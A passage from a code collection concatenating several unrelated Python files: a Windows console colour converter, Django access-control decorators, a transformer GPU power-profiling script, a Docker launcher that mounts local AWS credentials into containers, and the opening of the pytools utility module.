if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except (IOError, OSError):
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1163
#
# Also possible for Windows to throw an OSError error if the data is invalid for the console
# (garbage bytes, etc)
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
try:
self.output.flush()
except OSError:
# Account for Windows Console refusing to accept garbage bytes (serial noise, etc)
pass
if __name__ == "__main__":
main()
|
decorators.py
|
import threading
from functools import wraps
from django.core.exceptions import PermissionDenied
def require_member(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be an active Houston controller to access this endpoint!')
return inner
def require_session(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.session.get('vatsim_data'):
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be logged in to access this endpoint!')
return inner
def require_staff(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and request.user_obj.is_staff:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be a staff member to access this endpoint!')
return inner
def require_mentor(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and request.user_obj.is_mentor:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be a mentor or instructor to access this endpoint!')
return inner
def require_staff_or_mentor(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and (request.user_obj.is_staff or request.user_obj.is_mentor):
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be staff, mentor, or instructor to access this endpoint!')
return inner
def require_role(role_list):
def decorator(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and request.user_obj.main_role in role_list:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You lack the necessary role to access this endpoint!')
return inner
return decorator
def run_async(func):
@wraps(func)
def inner(*args, **kwargs):
threading.Thread(target=func, args=args, kwargs=kwargs).start()
return inner
|
power_dataset.py
|
# HAT: Hardware-Aware Transformers for Efficient Natural Language Processing
# Hanrui Wang, Zhanghao Wu, Zhijian Liu, Han Cai, Ligeng Zhu, Chuang Gan and Song Han
# The 58th Annual Meeting of the Association for Computational Linguistics (ACL), 2020.
# Paper: https://arxiv.org/abs/2005.14187
# Project page: https://hanruiwang.me/project_pages/hat/
import torch
import time
import pdb
import numpy as np
from fairseq import checkpoint_utils, distributed_utils, options, tasks, utils
from tqdm import tqdm
import threading
import pynvml
def main(args):
utils.import_user_module(args)
assert args.max_tokens is not None or args.max_sentences is not None, \
'Must specify batch size either with --max-tokens or --max-sentences'
# Initialize CUDA and distributed training
if torch.cuda.is_available() and not args.cpu:
torch.cuda.set_device(args.device_id)
torch.manual_seed(args.seed)
# Print args
print(args)
# Setup task
task = tasks.setup_task(args)
# Build model
model = task.build_model(args)
print(model)
# specify the length of the dummy input for profile
# for iwslt, the average length is 23, for wmt, that is 30
dummy_sentence_length_dict = {'iwslt': 23, 'wmt': 30}
if 'iwslt' in args.arch:
dummy_sentence_length = dummy_sentence_length_dict['iwslt']
elif 'wmt' in args.arch:
dummy_sentence_length = dummy_sentence_length_dict['wmt']
else:
raise NotImplementedError
dummy_src_tokens = [2] + [7] * (dummy_sentence_length - 1)
dummy_prev = [7] * (dummy_sentence_length - 1) + [2]
# for power predictor: power dataset generation
with open(args.lat_dataset_path, 'w') as fid:
src_tokens_test = torch.tensor([dummy_src_tokens], dtype=torch.long)
src_lengths_test = torch.tensor([dummy_sentence_length])
prev_output_tokens_test_with_beam = torch.tensor([dummy_prev] * args.beam, dtype=torch.long)
if args.latcpu:
model.cpu()
print('Measuring model power on CPU for dataset generation...')
elif args.latgpu:
model.cuda()
src_tokens_test = src_tokens_test.cuda()
src_lengths_test = src_lengths_test.cuda()
prev_output_tokens_test_with_beam = prev_output_tokens_test_with_beam.cuda()
src_tokens_test.get_device()
print('Measuring model power on GPU for dataset generation...')
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
feature_info = utils.get_feature_info()
fid.write(','.join(feature_info) + ',')
power_info = ['power_mean_encoder', 'power_mean_decoder', 'power_std_encoder', 'power_std_decoder']
fid.write(','.join(power_info) + '\n')
for i in range(args.lat_dataset_size):
print(i)
config_sam = utils.sample_configs(utils.get_all_choices(args), reset_rand_seed=False, super_decoder_num_layer=args.decoder_layers)
features = utils.get_config_features(config_sam)
fid.write(','.join(map(str, features)) + ',')
model.set_sample_config(config_sam)
# dry runs
for _ in range(5):
encoder_out_test = model.encoder(src_tokens=src_tokens_test, src_lengths=src_lengths_test)
encoder_powers = []
print('Measuring encoder for dataset generation...')
for _ in tqdm(range(args.latiter)):
if args.latgpu:
start.record()
elif args.latcpu:
start = time.time()
powers = []
pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(1)
thread_encoder = threading.Thread(target=model.encoder, args=(src_tokens_test, src_lengths_test))
thread_encoder.start()
while(thread_encoder.is_alive()):
powers.append(pynvml.nvmlDeviceGetPowerUsage(handle))
time.sleep(0.001)
pynvml.nvmlShutdown()
power = np.average(powers)
if args.latgpu:
end.record()
torch.cuda.synchronize()
encoder_powers.append(power/1000) #the result is W
if not args.latsilent:
print('Encoder one run on GPU (for dataset generation): ', power/1000)
elif args.latcpu:
end = time.time()
encoder_powers.append(power)
if not args.latsilent:
print('Encoder one run on CPU (for dataset generation): ', power)
# only use the 10% to 90% powers to avoid outliers
encoder_powers.sort()
encoder_powers = encoder_powers[int(args.latiter * 0.1): -max(1, int(args.latiter * 0.1))]
print(f'Encoder power for dataset generation: Mean: {np.mean(encoder_powers)} W; \t Std: {np.std(encoder_powers)} W')
bsz = 1
new_order = torch.arange(bsz).view(-1, 1).repeat(1, args.beam).view(-1).long()
if args.latgpu:
new_order = new_order.cuda()
encoder_out_test_with_beam = model.encoder.reorder_encoder_out(encoder_out_test, new_order)
# dry runs
for _ in range(5):
model.decoder(prev_output_tokens=prev_output_tokens_test_with_beam,
encoder_out=encoder_out_test_with_beam)
# decoder is more complicated because we need to deal with incremental states and auto regressive things
decoder_iterations_dict = {'iwslt': 23, 'wmt': 30}
if 'iwslt' in args.arch:
decoder_iterations = decoder_iterations_dict['iwslt']
elif 'wmt' in args.arch:
decoder_iterations = decoder_iterations_dict['wmt']
decoder_powers = []
print('Measuring decoder for dataset generation...')
for _ in tqdm(range(args.latiter)):
if args.latgpu:
start.record()
elif args.latcpu:
start = time.time()
powers = []
pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(1)
incre_states = {}
for k_regressive in range(decoder_iterations):
thread_decoder = threading.Thread(target=model.decoder, args=((prev_output_tokens_test_with_beam[:, :k_regressive + 1], encoder_out_test_with_beam, incre_states)))
thread_decoder.start()
while(thread_decoder.is_alive()):
powers.append(pynvml.nvmlDeviceGetPowerUsage(handle))
time.sleep(0.001)
pynvml.nvmlShutdown()
# print(powers)
power = np.average(powers)
if args.latgpu:
end.record()
torch.cuda.synchronize()
decoder_powers.append(power/1000) #the result is W
if not args.latsilent:
print('Decoder one run on GPU (for dataset generation): ', power/1000)
elif args.latcpu:
end = time.time()
decoder_powers.append(power)
if not args.latsilent:
print('Decoder one run on CPU (for dataset generation): ', power)
# only use the 10% to 90% powers to avoid outliers
decoder_powers.sort()
decoder_powers = decoder_powers[int(args.latiter * 0.1): -max(1, int(args.latiter * 0.1))]
print(decoder_powers)
print(f'Decoder power for dataset generation: Mean: {np.mean(decoder_powers)} W; \t Std: {np.std(decoder_powers)} W')
lats = [np.mean(encoder_powers), np.mean(decoder_powers), np.std(encoder_powers), np.std(decoder_powers)]
fid.write(','.join(map(str, lats)) + '\n')
def cli_main():
parser = options.get_training_parser()
parser.add_argument('--latgpu', action='store_true', help='measure SubTransformer power on GPU')
parser.add_argument('--latcpu', action='store_true', help='measure SubTransformer power on CPU')
parser.add_argument('--latiter', type=int, default=300, help='how many iterations to run when measure the power')
parser.add_argument('--latsilent', action='store_true', help='keep silent when measure power')
parser.add_argument('--lat-dataset-path', type=str, default='./power_dataset/lat.tmp', help='the path to write power dataset')
parser.add_argument('--lat-dataset-size', type=int, default=200, help='number of data points for the dataset')
options.add_generation_args(parser)
args = options.parse_args_and_arch(parser)
if args.latcpu:
args.cpu = True
args.fp16 = False
if args.pdb:
pdb.set_trace()
main(args)
if __name__ == '__main__':
cli_main()
|
init.py
|
import docker
from docker.models.images import Image
from docker.models.containers import _create_container_args
import yaml
import shutil
from multiprocessing import Process, Queue
from distutils.dir_util import copy_tree
import sys, os, time
from pathlib import Path
from jinja2 import Template
def build_image(docker_client, host_url, index_jinja_path, dockerfile_path, image_tag):
with open(index_jinja_path) as f:
raw_template = f.read()
index_template = Template(raw_template)
output_path = index_jinja_path.split('.j2')[0]
index_string = index_template.render(host=host_url)
with open(output_path, 'w') as f:
f.write(index_string)
try:
image, _ = docker_client.images.build(path=".", dockerfile=dockerfile_path, tag=image_tag, rm=True)
return image
except docker.errors.BuildError as e:
for line in e.build_log:
if 'stream' in line:
print(line)
raise e
def run_container(client, image, algorithmia_api_key, algorithmia_api_address, mode, local_aws=False, networking=False):
raw_args = {}
if isinstance(image, Image):
image = image.id
raw_args['image'] = image
raw_args['version'] = client.containers.client.api._version
home_dir = str(Path.home())
aws_dir = os.path.join(home_dir, ".aws")
if networking and local_aws:
raw_args['ports'] = {80: 80}
container_args = _create_container_args(raw_args)
container_args['host_config'] = client.api.create_host_config(port_bindings={80: ("0.0.0.0", 80)},
binds={aws_dir: {'bind': "/root/.aws", "mode": "ro"}})
container_args['volumes'] = ["/root/.aws"]
elif networking:
raw_args['ports'] = {80: 80}
container_args = _create_container_args(raw_args)
container_args['host_config'] = client.api.create_host_config(port_bindings={80: ("0.0.0.0", 80)})
elif local_aws:
container_args = _create_container_args(raw_args)
container_args['host_config'] = client.api.create_host_config(binds={aws_dir: {'bind': "/root/.aws", "mode": "ro"}})
container_args['volumes'] = ["/root/.aws"]
else:
container_args = _create_container_args(raw_args)
container_args['detach'] = True
container_args['environment'] = {}
container_args['environment']['ALGORITHMIA_API_KEY'] = algorithmia_api_key
container_args['environment']['ALGORITHMIA_API_ADDRESS'] = algorithmia_api_address
container_args['environment']['MODE'] = mode
resp = client.api.create_container(**container_args)
client.api.start(resp['Id'])
return resp['Id']
def stop_and_kill_containers(docker_client, all=False):
"""
Kills all docker containers, if all is =true, it kills all containers whether running or not
:param docker_client: The docker python client
:param all: Boolean variable defining whether we destroy 'all' docker containers, or just running ones
:return: None
"""
containers = docker_client.containers.list(all=all, ignore_removed=True)
for container in containers:
try:
container.remove(force=True)
except docker.errors.APIError:
pass
def kill_dangling_images(docker_client):
"""
Kills all dangling images, to free up disk space
:param docker_client: The docker python client
:return: None
"""
images = docker_client.images.list()
for image in images:
if len(image.tags) == 0:
docker_client.images.remove(image.id, force=True)
def copy_aws_dir():
print("copying creds")
home_path = os.getenv("HOME", None)
aws_cred_path = os.path.join(home_path, ".aws")
copy_tree(aws_cred_path, ".aws")
def get_log_and_push(logger, queue, name):
for message in logger:
message = str(message, 'utf-8')
messages_split = message.split('\n')[0:-1]
for message in messages_split:
queue.put("{} - {}".format(name, message))
client = docker.from_env()
if __name__ == "__main__":
try:
if len(sys.argv) > 1:
mode = str(sys.argv[1])
else:
mode = None
with open('config.yaml') as f:
data = yaml.safe_load(f)
if 'aws' in data and 'credentials' in data['aws']:
creds = data['aws']['credentials']
if 'IAM' in creds and isinstance(creds['IAM'], dict) and 'local_iam' in creds['IAM']:
copy_aws_dir()
local_credentials = True
else:
local_credentials = False
else:
raise Exception("your 'config.yaml' file is misconfigured around 'aws'")
if 'algorithmia' in data and ('api_key' in data['algorithmia'] and 'api_address' in data['algorithmia']):
api_key = data['algorithmia']['api_key']
api_address = data['algorithmia']['api_address']
else:
raise Exception("your 'config.yaml' file is misconfigured around 'algorithmia'")
if 'video' in data and isinstance(data['video'], dict):
host = data['video']['host']
else:
raise Exception("your 'config.yaml' file is misconfigured around 'video'")
image = build_image(client, host, "src/www/index.html.j2", "Dockerfile", "streaming")
if mode:
if mode == "generate":
container = run_container(client, image, api_key, api_address, "generate", local_aws=local_credentials)
elif mode == "process":
container = run_container(client, image, api_key, api_address, "process", local_aws=local_credentials)
elif mode == "broadcast":
container = run_container(client, image, api_key, api_address, "broadcast", local_aws=local_credentials,
networking=True)
else:
raise Exception(
"variable passed to init.py was {}, must be 'generate', 'process', or 'broadcast'".format(mode))
logger = client.api.attach(container, stream=True, logs=True, stdout=True, stderr=True)
for msg in logger:
print(str(msg, 'utf-8'))
else:
logging_queue = Queue()
generator = run_container(client, image, api_key, api_address, "generate", local_aws=local_credentials)
processor = run_container(client, image, api_key, api_address, "process", local_aws=local_credentials)
broadcaster = run_container(client, image, api_key, api_address, "broadcast", local_aws=local_credentials, networking=True)
streams = [(container_name, client.api.attach(container, stdout=True, logs=True, stderr=True, stream=True))
for
container_name, container in
[("generate", generator), ("process", processor), ("broadcast", broadcaster)]]
threads = [Process(target=get_log_and_push, args=(stream, logging_queue, name)) for name, stream in streams]
[thread.start() for thread in threads]
print("streaming started, connecting to containers")
while True:
if logging_queue.empty():
time.sleep(0.25)
else:
msg = logging_queue.get()
print(msg)
except KeyboardInterrupt as e:
print("killing")
stop_and_kill_containers(client, True)
path = os.path.join(os.getcwd(), '.aws')
if os.path.exists(path):
shutil.rmtree(path, ignore_errors=True)
except Exception as e:
print("killing")
stop_and_kill_containers(client, True)
path = os.path.join(os.getcwd(), '.aws')
if os.path.exists(path):
shutil.rmtree(path, ignore_errors=True)
raise e
|
__init__.py
|
# pylint: disable=too-many-lines
# (Yes, it has a point!)
__copyright__ = """
Copyright (C) 2009-2013 Andreas Kloeckner
Copyright (C) 2020 Matt Wala
"""
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import re
from functools import reduce, wraps
import operator
import sys
import logging
from typing import (
Any, Callable, Dict, Hashable, Iterable,
List, Optional, Set, Tuple, TypeVar)
import builtins
from sys import intern
# These are deprecated and will go away in 2022.
all = builtins.all
any = builtins.any
__doc__ = """
A Collection of Utilities
=========================
Math
----
.. autofunction:: levi_civita
.. autofunction:: perm
.. autofunction:: comb
Assertive accessors
-------------------
.. autofunction:: one
.. autofunction:: is_single_valued
.. autofunction:: all_roughly_equal
.. autofunction:: single_valued
Memoization
-----------
.. autofunction:: memoize
.. autofunction:: memoize_on_first_arg
.. autofunction:: memoize_method
.. autofunction:: memoize_in
.. autofunction:: keyed_memoize_on_first_arg
.. autofunction:: keyed_memoize_method
.. autofunction:: keyed_memoize_in
Argmin/max
----------
.. autofunction:: argmin2
.. autofunction:: argmax2
.. autofunction:: argmin
.. autofunction:: argmax
Cartesian products
------------------
.. autofunction:: cartesian_product
.. autofunction:: distinct_pairs
Permutations, Tuples, Integer sequences
---------------------------------------
.. autofunction:: wandering_element
.. autofunction:: generate_nonnegative_integer_tuples_below
.. autofunction:: generate_nonnegative_integer_tuples_summing_to_at_most
.. autofunction:: generate_all_integer_tuples_below
.. autofunction:: generate_permutations
.. autofunction:: generate_unique_permutations
Formatting
----------
.. autoclass:: Table
.. autofunction:: string_histogram
.. autofunction:: word_wrap
Debugging
---------
.. autofunction:: typedump
.. autofunction:: invoke_editor
Progress bars
-------------
.. autoclass:: ProgressBar
Name generation
---------------
.. autofunction:: generate_unique_names
.. autofunction:: generate_numbered_unique_names
.. autoclass:: UniqueNameGenerator
Deprecation Warnings
--------------------
.. autofunction:: deprecate_keyword
Functions for dealing with (large) auxiliary files
--------------------------------------------------
.. autofunction:: download_from_web_if_not_present
Helpers for :mod:`numpy`
------------------------
.. autofunction:: reshaped_view
Timing data
-----------
.. autoclass:: ProcessTimer
Log utilities
-------------
.. autoclass:: ProcessLogger
.. autoclass:: DebugProcessLogger
.. autoclass:: log_process
Sorting in natural order
------------------------
.. autofunction:: natorder
.. autofunction:: natsorted
Backports of newer Python functionality
---------------------------------------
.. autofunction:: resolve_name
Hashing
-------
.. autofunction:: unordered_hash
Sampling
--------
.. autofunction:: sphere_sample_equidistant
.. autofunction:: sphere_sample_fibonacci
Type Variables Used
-------------------
.. class:: T
Any type.
.. class:: F
Any callable.
"""
# {{{ type variables
T = TypeVar("T")
F = TypeVar("F", bound=Callable[..., Any])
# }}}
# {{{ code maintenance
class MovedFunctionDeprecationWrapper:
def __init__(self, f, deadline=None):
if deadline is None:
deadline = "the future"
self.f = f
self.deadline = deadline
def __call__(self, *args, **kwargs):
from warnings import warn
warn(f"This function is deprecated and will go away in {self.deadline}. "
f"Use {self.f.__module__}.{self.f.__name__} instead.",
DeprecationWarning, stacklevel=2)
return self.f(*args, **kwargs)
def deprecate_keyword(oldkey: str,
newkey: Optional[str] = None, *,
deadline: Optional[str] = None):
"""Decorator used to deprecate function keyword arguments.
:arg oldkey: deprecated argument name.
:arg newkey: new argument name that serves the same purpose, if any.
:arg deadline: expected time frame for the removal of the deprecated argument.
"""
from warnings import warn
if deadline is None:
deadline = "the future"
def wrapper(func):
@wraps(func)
def inner_wrapper(*args, **kwargs):
if oldkey in kwargs:
if newkey is None:
warn(f"The '{oldkey}' keyword is deprecated and will "
f"go away in {deadline}.",
DeprecationWarning, stacklevel=2)
else:
warn(f"The '{oldkey}' keyword is deprecated and will "
f"go away in {deadline}. "
f"Use '{newkey}' instead.",
DeprecationWarning, stacklevel=2)
if newkey in kwargs:
raise ValueError(f"Cannot use '{oldkey}' "
f"and '{newkey}' in the same call.")
kwargs[newkey] = kwargs[oldkey]
del kwargs[oldkey]
return func(*args, **kwargs)
return inner_wrapper
return wrapper
# }}}
# {{{ math
def delta(x, y):
if x == y:
return 1
else:
return 0
def levi_civita(tup):
"""Compute an entry of the Levi-Civita tensor for the indices *tuple*."""
if len(tup) == 2:
i, j = tup
return j-i
if len(tup) == 3:
i, j, k = tup
return (j-i)*(k-i)*(k-j)/2
else:
raise NotImplementedError
def factorial(n):
from operator import mul
assert n == int(n)
return reduce(mul, (i for i in range(1, n+1)), 1)
def perm(n, k):
"""Return P(n, k), the number of permutations of length k drawn from n
choices.
"""
result = 1
assert k > 0
while k:
result *= n
n -= 1
k -= 1
return result
def comb(n, k):
"""Return C(n, k), the number of combinations (subsets)
of length k drawn from n choices.
"""
return perm(n, k)//factorial(k)
def norm_1(iterable):
return sum(abs(x) for x in iterable)
def norm_2(iterable):
return sum(x**2 for x in iterable)**0.5
def norm_inf(iterable):
return max(abs(x) for x in iterable)
def norm_p(iterable, p):
return sum(i**p for i in iterable)**(1/p)
class Norm:
def __init__(self, p):
self.p = p
def __call__(self, iterable):
return sum(i**self.p for i in iterable)**(1/self.p)
# }}}
# {{{ data structures
# {{{ record
class RecordWithoutPickling:
"""An aggregate of named sub-variables. Assumes that each record sub-type
will be individually derived from this class.
"""
__slots__: List[str] = []
def __init__(self, valuedict=None, exclude=None, **kwargs):
assert self.__class__ is not Record
if exclude is None:
exclude = ["self"]
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
if valuedict is not None:
kwargs.update(valuedict)
for key, value in kwargs.items():
if key not in exclude:
fields.add(key)
setattr(self, key, value)
def get_copy_kwargs(self, **kwargs):
for f in self.__class__.fields:
if f not in kwargs:
try:
kwargs[f] = getattr(self, f)
except AttributeError:
pass
return kwargs
def copy(self, **kwargs):
return self.__class__(**self.get_copy_kwargs(**kwargs))
def __repr__(self):
return "{}({})".format(
self.__class__.__name__,
", ".join(f"{fld}={getattr(self, fld)!r}"
for fld in self.__class__.fields
if hasattr(self, fld)))
def register_fields(self, new_fields):
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
fields.update(new_fields)
def __getattr__(self, name):
# This method is implemented to avoid pylint 'no-member' errors for
# attribute access.
raise AttributeError(
"'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
class Record(RecordWithoutPickling):
__slots__: List[str] = []
def __getstate__(self):
return {
key: getattr(self, key)
for key in self.__class__.fields
if hasattr(self, key)}
def __setstate__(self, valuedict):
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
for key, value in valuedict.items():
fields.add(key)
setattr(self, key, value)
def __eq__(self, other):
return (self.__class__ == other.__class__
and self.__getstate__() == other.__getstate__())
def __ne__(self, other):
return not self.__eq__(other)
class ImmutableRecordWithoutPickling(RecordWithoutPickling):
"""Hashable record. Does not explicitly enforce immutability."""
def __init__(self, *args, **kwargs):
RecordWithoutPickling.__init__(self, *args, **kwargs)
self._cached_hash = None
def __hash__(self):
if self._cached_hash is None:
self._cached_hash = hash(
(type(self),) + tuple(getattr(self, field)
for field in self.__class__.fields))
return self._cached_hash
class ImmutableRecord(ImmutableRecordWithoutPickling, Record):
pass
# }}}
class Reference:
def __init__(self, value):
self.value = value
def get(self):
from warnings import warn
warn("Reference.get() is deprecated -- use ref.value instead")
return self.value
def set(self, value):
self.value = value
class FakeList:
def __init__(self, f, length):
self._Length = length
self._Function = f
def __len__(self):
return self._Length
def __getitem__(self, index):
try:
return [self._Function(i)
for i in range(*index.indices(self._Length))]
except AttributeError:
return self._Function(index)
# {{{ dependent dictionary
class DependentDictionary:
def __init__(self, f, start=None):
if start is None:
start = {}
self._Function = f
self._Dictionary = start.copy()
def copy(self):
return DependentDictionary(self._Function, self._Dictionary)
def __contains__(self, key):
try:
self[key] # pylint: disable=pointless-statement
return True
except KeyError:
return False
def __getitem__(self, key):
try:
return self._Dictionary[key]
except KeyError:
return self._Function(self._Dictionary, key)
def __setitem__(self, key, value):
self._Dictionary[key] = value
def genuineKeys(self): # noqa
return list(self._Dictionary.keys())
def iteritems(self):
return self._Dictionary.items()
def iterkeys(self):
return self._Dictionary.keys()
def itervalues(self):
return self._Dictionary.values()
# }}}
# }}}
# {{{ assertive accessors
def one(iterable: Iterable[T]) -> T:
"""Return the first entry of *iterable*. Assert that *iterable* has only
that one entry.
"""
it = iter(iterable)
try:
v = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'one()'")
def no_more():
try:
next(it)
raise ValueError("iterable with more than one entry passed to 'one()'")
except StopIteration:
return True
assert no_more()
return v
def is_single_valued(
iterable: Iterable[T],
equality_pred: Callable[[T, T], bool] = operator.eq
) -> bool:
it = iter(iterable)
try:
first_item = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'single_valued()'")
for other_item in it:
if not equality_pred(other_item, first_item):
return False
return True
all_equal = is_single_valued
def all_roughly_equal(iterable, threshold):
return is_single_valued(iterable,
equality_pred=lambda a, b: abs(a-b) < threshold)
def single_valued(
iterable: Iterable[T],
equality_pred: Callable[[T, T], bool] = operator.eq
) -> T:
"""Return the first entry of *iterable*; Assert that other entries
are the same with the first entry of *iterable*.
"""
it = iter(iterable)
try:
first_item = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'single_valued()'")
def others_same():
for other_item in it:
if not equality_pred(other_item, first_item):
return False
return True
assert others_same()
return first_item
# }}}
# {{{ memoization / attribute storage
def memoize(*args: F, **kwargs: Any) -> F:
"""Stores previously computed function values in a cache.
Two keyword-only arguments are supported:
:arg use_kwargs: Allows the caller to use keyword arguments. Defaults to
``False``. Setting this to ``True`` has a non-negligible performance
impact.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
"""
use_kw = bool(kwargs.pop("use_kwargs", False))
default_key_func: Optional[Callable[..., Any]]
if use_kw:
def default_key_func(*inner_args, **inner_kwargs): # noqa pylint:disable=function-redefined
return inner_args, frozenset(inner_kwargs.items())
else:
default_key_func = None
key_func = kwargs.pop("key", default_key_func)
if kwargs:
raise TypeError(
"memoize received unexpected keyword arguments: {}".format(
", ".join(kwargs.keys())))
if key_func is not None:
def _decorator(func):
def wrapper(*args, **kwargs):
key = key_func(*args, **kwargs)
try:
return func._memoize_dic[key] # noqa: E501 # pylint: disable=protected-access
except AttributeError:
# _memoize_dic doesn't exist yet.
result = func(*args, **kwargs)
func._memoize_dic = {key: result} # noqa: E501 # pylint: disable=protected-access
return result
except KeyError:
result = func(*args, **kwargs)
func._memoize_dic[key] = result # noqa: E501 # pylint: disable=protected-access
return result
from functools import update_wrapper
update_wrapper(wrapper, func)
return wrapper
else:
def _decorator(func):
def wrapper(*args):
try:
return func._memoize_dic[args] # noqa: E501 # pylint: disable=protected-access
except AttributeError:
# _memoize_dic doesn't exist yet.
result = func(*args)
func._memoize_dic = {args: result} # noqa: E501 # pylint:disable=protected-access
return result
except KeyError:
result = func(*args)
func._memoize_dic[args] = result # noqa: E501 # pylint: disable=protected-access
return result
from functools import update_wrapper
update_wrapper(wrapper, func)
return wrapper
if not args:
return _decorator # type: ignore
if callable(args[0]) and len(args) == 1:
return _decorator(args[0])
raise TypeError(
f"memoize received unexpected position arguments: {args}")
FunctionValueCache = memoize
class _HasKwargs:
pass
def memoize_on_first_arg(function, cache_dict_name=None):
"""Like :func:`memoize_method`, but for functions that take the object
in which do memoization information is stored as first argument.
Supports cache deletion via ``function_name.clear_cache(self)``.
"""
if cache_dict_name is None:
cache_dict_name = intern(
f"_memoize_dic_{function.__module__}{function.__name__}"
)
def wrapper(obj, *args, **kwargs):
if kwargs:
key = (_HasKwargs, frozenset(kwargs.items())) + args
else:
key = args
try:
return getattr(obj, cache_dict_name)[key]
except AttributeError:
attribute_error = True
except KeyError:
attribute_error = False
result = function(obj, *args, **kwargs)
if attribute_error:
object.__setattr__(obj, cache_dict_name, {key: result})
return result
else:
getattr(obj, cache_dict_name)[key] = result
return result
def clear_cache(obj):
object.__delattr__(obj, cache_dict_name)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, function)
new_wrapper.clear_cache = clear_cache
return new_wrapper
def memoize_method(method: F) -> F:
"""Supports cache deletion via ``method_name.clear_cache(self)``.
.. versionchanged:: 2021.2
Can memoize methods on classes that do not allow setting attributes
(e.g. by overwritting ``__setattr__``), e.g. frozen :mod:`dataclasses`.
"""
return memoize_on_first_arg(method,
intern(f"_memoize_dic_{method.__name__}"))
class keyed_memoize_on_first_arg: # noqa: N801
"""Like :func:`memoize_method`, but for functions that take the object
in which memoization information is stored as first argument.
Supports cache deletion via ``function_name.clear_cache(self)``.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
:arg cache_dict_name: The name of the `dict` attribute in the instance
used to hold the cache.
.. versionadded :: 2020.3
"""
def __init__(self, key, cache_dict_name=None):
self.key = key
self.cache_dict_name = cache_dict_name
def _default_cache_dict_name(self, function):
return intern(f"_memoize_dic_{function.__module__}{function.__name__}")
def __call__(self, function):
cache_dict_name = self.cache_dict_name
key = self.key
if cache_dict_name is None:
cache_dict_name = self._default_cache_dict_name(function)
def wrapper(obj, *args, **kwargs):
cache_key = key(*args, **kwargs)
try:
